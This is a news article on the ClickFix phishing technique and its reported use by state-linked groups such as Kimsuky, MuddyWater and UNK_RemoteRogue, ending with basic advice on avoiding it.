Through ClickFix, attackers craft convincing fake sites that resemble real software or file-sharing portals. Users are tricked by bogus error messages into thinking a download has failed and are then instructed to “fix” the issue by running a command-line or PowerShell script—effectively installing malware themselves.
A new report from cybersecurity firm Proofpoint reveals a sharp rise in the use of ClickFix between late 2024 and early 2025. Among the threat actors adopting the technique are well-known APT groups such as Kimsuky (North Korea), MuddyWater (Iran), APT28, and a newly identified Russian-linked actor dubbed UNK_RemoteRogue.
Kimsuky, a North Korean APT group, launched a phishing campaign targeting Korean policy think tanks, using emails spoofing Japanese diplomats. Victims were led to fake secure drives and prompted to execute PowerShell-based device registration, resulting in the stealthy deployment of QuasarRAT, all while decoy docs kept suspicion at bay.
MuddyWater, the Iranian cyber-espionage group, struck again in late 2024 by spoofing Microsoft in a phishing campaign that spanned 39 Middle Eastern entities. Disguised as a critical update, the PowerShell script actually installed ‘Level,’ a stealthy tool used to spy on systems and steal sensitive data.
UNK_RemoteRogue, a Russia-affiliated threat actor, launched a December 2024 phishing campaign against defense-related firms. Exploiting compromised Zimbra email servers, they redirected users to phony Microsoft Word sites complete with a YouTube tutorial—tricking them into running PowerShell scripts linked to the Empire C2 command-and-control infrastructure.
Microsoft Joins Forces with Experts to Address the Threat
Previously, Microsoft’s Threat Intelligence division sounded the alarm on ClickFix’s use by Kimsuky, calling for increased international vigilance.
Experts in the field urge users to take the following steps:
- Always verify commands before executing them from emails or websites.
- Never run scripts from unfamiliar sources in your terminal or PowerShell window.
- Verify the sender's email, domain name, and writing quality to detect phishing attempts.
